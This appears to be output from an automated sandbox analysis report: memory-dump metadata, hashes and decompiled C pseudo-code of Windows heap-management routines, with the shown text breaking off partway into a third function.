0x029c5a91
0x029c5a97
0x029c5a9f
0x029c5aa0
0x029c5aa1
0x029c5aa6
0x029c5aab
0x029c5ab1
0x029c5ab3
0x029c5ab9
0x029c5aca
0x029c5ad4
0x029c5ad4
0x029c5ade
0x029c5ade
0x029c5aab
0x029c5a79
0x029c5a52
0x029821f7
0x029821f9
0x029821fe
0x029821fe
0x029821e3
0x02982195
0x0298236c
0x02982122
0x02982122
0x02982124
0x02982231
0x02982236
0x02982236
0x02982238
0x02982238
0x02982240
0x02982242
0x02982244
0x029c59fc
0x0298218c
0x0298218c
0x00000000
0x0298218c
0x0298224a
0x0298224f
0x02982256
0x02982304
0x02982309
0x0298230f
0x0298231e
0x0298231e
0x0298231e
0x02982320
0x02982325
0x0298232a
0x0298232c
0x0298233e
0x0298233e
0x00000000
0x0298232c
0x02982311
0x02982317
0x0298231a
0x0298231c
0x02982380
0x02982380
0x02982380
0x02982384
0x00000000
0x00000000
0x02982386
0x00000000
0x0298231c
0x0298225c
0x0298225c
0x00000000
0x0298225c
0x0298212a
0x02982134
0x02982138
0x0298213d
0x029c5858
0x029c5863
0x029c5863
0x029c5867
0x029c586a
0x00000000
0x00000000
0x029c586c
0x029c586c
0x029c5871
0x029c5875
0x029c5877
0x029c5997
0x029c599c
0x029c59a1
0x029c59a7
0x029c59a7
0x00000000
0x029c59a7
0x029c587d
0x00000000
0x029c588b
0x029c588b
0x029c5890
0x029c5892
0x029c5894
0x029c5899
0x029c589b
0x029c58a0
0x029c58a0
0x029c58aa
0x029c58b2
0x029c58b6
0x029c58be
0x029c58c6
0x029c58c9
0x029c590d
0x029c5917
0x029c591a
0x029c591c
0x029c5920
0x029c5928
0x029c592a
0x029c592c
0x029c592e
0x029c592e
0x029c58cb
0x029c58cd
0x029c58d8
0x029c58e0
0x029c58f4
0x029c58fe
0x029c58fe
0x029c593a
0x029c593e
0x029c5940
0x029c5942
0x00000000
0x029c5944
0x029c5944
0x029c5949
0x029c594e
0x029c594e
0x029c5953
0x029c595b
0x029c5976
0x029c5976
0x029c597a
0x029c597f
0x00000000
0x00000000
0x00000000
0x00000000
0x029c5981
0x029c5981
0x029c5981
0x029c5983
0x029c5988
0x029c598d
0x029c5991
0x029c5991
0x00000000
0x029c595d
0x029c595d
0x029c5963
0x029c5965
0x00000000
0x00000000
0x00000000
0x00000000
0x029c5967
0x029c5967
0x029c596b
0x029c596d
0x00000000
0x00000000
0x029c596f
0x029c5971
0x029c5971
0x029c5974
0x00000000
0x00000000
0x00000000
0x029c5974
0x00000000
0x029c5967
0x029c595b
0x029c5942
0x029c5863
0x02982143
0x02982143
0x02982149
0x0298214f
0x029822f1
0x029822f6
0x00000000
0x02982173
0x02982173
0x0298217d
0x02982181
0x02982186
0x029c59ae
0x029c59b2
0x029c59b5
0x029c59b7
0x029c59ba
0x029c59cd
0x029c59d1
0x029c59d5
0x029c59d9
0x029c59db
0x00000000
0x00000000
0x029c59dd
0x029c59dd
0x029c59e1
0x029c59e4
0x029c59e7
0x029c59ee
0x029c59ee
0x029c59f3
0x029c59f3
0x00000000
0x02982186
0x0298214f
0x02982106
0x02982266
0x029820d8
0x029820da
0x029820e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce478d74fd9cc9d5e8d9ae41f55877661f6a71dc6752699cdd60ad24aff531b
Instruction ID: 7f09c0ef5b0a0a6f6792b35abc150f2b76cfb73121dd614c672c59d29c3acc70
Opcode Fuzzy Hash: bce478d74fd9cc9d5e8d9ae41f55877661f6a71dc6752699cdd60ad24aff531b
Instruction Fuzzy Hash: 77F10731E083819FD729DF28C84076A77E9AFC5724F69895DEC999B280D735E841CB43

Uniqueness

Uniqueness Score: -1.00%

Function 0297B236, Relevance: .3, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E0297B236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E0297B477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E029FCB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E02980678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E02999660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E02999660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E02999660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E0298174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E0298138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E02977D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E02A1138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E02977D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E02A11582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E02977D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E02977D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E02A11582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E02977D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E02A0FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E02A0FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E029799BF(__ecx, _t87,  &_v16, 0);
					E0297A830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E02A0FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}

0x0297b23f
0x0297b246
0x0297b249
0x0297b24b
0x0297b251
0x0297b258
0x0297b262
0x0297b2b2
0x0297b2b6
0x0297b456
0x0297b456
0x0297b45a
0x029c2912
0x029c2914
0x029c2916
0x00000000
0x00000000
0x029c291f
0x029c2921
0x00000000
0x00000000
0x029c2927
0x00000000
0x029c2927
0x0297b460
0x0297b460
0x0297b462
0x0297b464
0x029c292e
0x029c2931
0x029c293f
0x029c2945
0x029c2945
0x029c2931
0x00000000
0x0297b464
0x0297b2bc
0x0297b2bf
0x0297b2c5
0x0297b2c8
0x0297b2ca
0x029c27af
0x029c27af
0x0297b2d0
0x0297b2d7
0x0297b437
0x0297b2dd
0x0297b2dd
0x0297b2dd
0x0297b2e3
0x0297b2e5
0x0297b43e
0x0297b443
0x029c27b6
0x029c27b6
0x0297b443
0x0297b2f5
0x0297b2fa
0x0297b2fd
0x0297b2ff
0x0297b46f
0x0297b46f
0x0297b30a
0x0297b30f
0x0297b310
0x0297b315
0x0297b31b
0x0297b31c
0x0297b321
0x0297b322
0x0297b329
0x0297b32b
0x0297b32d
0x029c27c2
0x029c27c2
0x029c27c5
0x029c27c7
0x00000000
0x00000000
0x029c27c9
0x029c27cb
0x029c27ce
0x029c27d0
0x029c27d2
0x029c27d2
0x029c27d5
0x029c27db
0x029c27e0
0x029c27e1
0x029c27e6
0x029c27e7
0x029c27ee
0x029c27f0
0x029c27f2
0x00000000
0x029c27f4
0x029c27f4
0x00000000
0x029c27f4
0x029c27f2
0x029c27f7
0x029c27f9
0x00000000
0x00000000
0x029c27ff
0x00000000
0x0297b333
0x0297b333
0x0297b336
0x0297b336
0x0297b33c
0x0297b341
0x0297b344
0x0297b44e
0x0297b44e
0x0297b34a
0x0297b34d
0x0297b353
0x0297b358
0x0297b359
0x0297b35e
0x0297b35f
0x0297b366
0x0297b368
0x0297b36a
0x029c28f2
0x029c28fe
0x029c2903
0x029c2903
0x00000000
0x0297b370
0x0297b38c
0x0297b391
0x0297b393
0x029c280a
0x029c280a
0x0297b399
0x0297b39b
0x00000000
0x0297b3a1
0x0297b3a1
0x0297b3a6
0x0297b3b0
0x0297b3b2
0x029c281d
0x0297b3b8
0x0297b3b8
0x0297b3b8
0x0297b3ba
0x0297b3bd
0x029c2824
0x029c282a
0x029c2831
0x029c2841
0x029c284b
0x029c284d
0x029c2858
0x029c2858
0x029c2858
0x029c2870
0x029c2870
0x029c2831
0x0297b3c3
0x0297b3c8
0x0297b3d2
0x0297b3d4
0x029c2883
0x0297b3da
0x0297b3da
0x0297b3da
0x0297b3dc
0x0297b3df
0x029c288f
0x029c2891
0x029c289c
0x029c289c
0x029c289c
0x029c28b4
0x029c28b4
0x0297b3e5
0x0297b3ea
0x0297b3ec
0x029c28c7
0x0297b3f2
0x0297b3f2
0x0297b3f2
0x0297b3f7
0x0297b3fa
0x029c28d9
0x029c28d9
0x0297b400
0x0297b407
0x0297b40a
0x0297b40f
0x0297b413
0x0297b41f
0x0297b424
0x0297b426
0x029c28e3
0x029c28e8
0x029c28e8
0x0297b426
0x0297b42f
0x00000000
0x0297b42f
0x0297b39b
0x0297b36a
0x0297b264
0x0297b264
0x0297b279
0x0297b27f
0x0297b287
0x0297b28c
0x0297b290
0x0297b29c
0x0297b2a3
0x029c27a0
0x029c27a5
0x029c27a5
0x0297b2a3
0x0297b2a9
0x0297b2b1
0x0297b2b1

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction ID: f56cd22650b441985207bd8785a66b8383bc43d082b8aba5bb054c11657a63f0
Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction Fuzzy Hash: 1AB10631B046099FDB15DBA9C8A0B7EB7FAEF84308F240569E946D7381DB30E941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0296849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0296849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x2a2f9c0);
				E029AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x2a47b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0296CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E02972280( *[fs:0x30], 0x2a48550);
						_t139 =  *0x2a47b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0298F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0296FFB0(_t193, _t235, 0x2a48550);
								L5:
								return E029AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E02951C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x2a47b9c; // 0x0
							_t235 = L02974620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x2a47b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0298A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0296FFB0(_t193, _t235, 0x2a48550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L029777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L029777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x2a47b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x2a47b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E029937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x2a47b9c; // 0x0
									_t214 = L02974620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E029937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x2a47b10 =  *0x2a47b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x2a47b04 =  *0x2a47b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L029777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L029777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x2a47b08 =  *0x2a47b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E029957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0299F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L029777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0298A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L029777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E029996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0296849b
0x0296849b
0x0296849b
0x0296849b
0x0296849d
0x029684a2
0x029684a7
0x029684b1
0x029684d8
0x00000000
0x029684b3
0x029684c4
0x029684c9
0x029684cd
0x029684cf
0x029684cf
0x029684d6
0x029684e6
0x029684e9
0x029684ec
0x029684ef
0x029684f2
0x029684f4
0x029684fc
0x02968501
0x02968506
0x02968509
0x029686e0
0x029686e5
0x029686e8
0x029686ed
0x029686f0
0x029686f2
0x029b9afd
0x029b9b02
0x029684da
0x029684df
0x029684df
0x029686fa
0x029686fd
0x029686fe
0x02968701
0x02968706
0x02968709
0x0296870b
0x00000000
0x00000000
0x02968711
0x02968725
0x02968727
0x0296872a
0x0296872c
0x029b9af0
0x029b9af5
0x02968732
0x02968732
0x02968732
0x02968735
0x02968737
0x02968515
0x02968515
0x02968518
0x0296851d
0x02968523
0x02968527
0x0296852b
0x02968537
0x02968539
0x0296853c
0x0296853e
0x0296868c
0x02968691
0x02968699
0x0296869b
0x02968744
0x02968748
0x029686a1
0x029686a1
0x029686a1
0x029686a4
0x029686a8
0x029b9bdf
0x029b9bdf
0x029686ae
0x029686b0
0x00000000
0x029686b6
0x00000000
0x029b9be9
0x029686b0
0x02968544
0x0296854a
0x0296854d
0x02968551
0x0296876e
0x02968778
0x0296877b
0x02968780
0x02968557
0x02968557
0x0296855d
0x0296855d
0x0296856b
0x0296856e
0x02968570
0x02968573
0x02968576
0x02968576
0x02968579
0x0296857b
0x00000000
0x00000000
0x02968581
0x029685a0
0x029685a2
0x029685a5
0x029685a7
0x029b9b1b
0x029b9b1b
0x0296862e
0x0296862e
0x02968631
0x02968631
0x02968634
0x02968636
0x02968669
0x02968669
0x0296866b
0x029b9bbf
0x029b9bc4
0x029b9bc8
0x029b9bce
0x029b9bce
0x02968671
0x02968671
0x02968674
0x02968676
0x029b9bae
0x029b9bae
0x02968676
0x0296867c
0x0296867e
0x02968688
0x02968688
0x00000000
0x0296867e
0x02968638
0x02968638
0x0296863b
0x0296863e
0x0296863f
0x02968642
0x02968645
0x02968648
0x0296864d
0x029b9b69
0x029b9b6e
0x029b9b7b
0x029b9b81
0x029b9b85
0x029b9b89
0x029b9ba7
0x029b9b8b
0x029b9b91
0x029b9b9a
0x029b9b9f
0x029b9b9f
0x02968788
0x0296878d
0x02968763
0x02968763
0x02968766
0x00000000
0x02968766
0x029b9b70
0x00000000
0x029b9b70
0x02968656
0x0296865a
0x0296865c
0x02968752
0x02968756
0x00000000
0x00000000
0x0296875e
0x00000000
0x0296875e
0x02968662
0x02968662
0x02968662
0x02968666
0x00000000
0x02968666
0x029685b7
0x029685b9
0x029685bc
0x029685bf
0x029685cc
0x029685d1
0x029685d4
0x029685db
0x029685de
0x029685e0
0x029b9b5f
0x00000000
0x029b9b5f
0x029685e6
0x029685ea
0x029686c3
0x029686c5
0x029686c8
0x029686ca
0x029b9b16
0x00000000
0x029b9b16
0x029686d6
0x029685f6
0x029685f6
0x029685f9
0x02968602
0x02968606
0x0296860a
0x0296860b
0x0296860e
0x02968611
0x00000000
0x02968611
0x029685f3
0x00000000
0x029685f3
0x02968619
0x0296861e
0x0296861e
0x02968621
0x02968622
0x02968623
0x02968625
0x0296862c
0x00000000
0x0296873d
0x00000000
0x0296873d
0x02968737
0x0296850f
0x02968512
0x00000000
0x02968512
0x00000000
0x029684d6

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb9c2317af1931281f6bfb5eb01929ad6a7e38f453ecb084f42c42e298752b7
Instruction ID: cef264af270bb6f7cc7d83837ea07f3ef78aeaa6820498fe6abd116536b812d7
Opcode Fuzzy Hash: 0cb9c2317af1931281f6bfb5eb01929ad6a7e38f453ecb084f42c42e298752b7
Instruction Fuzzy Hash: C5B16FB4E00259DFDB15DF98C984AADFBFAFF88304F104529E506AB241DB71A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0295C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0295C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
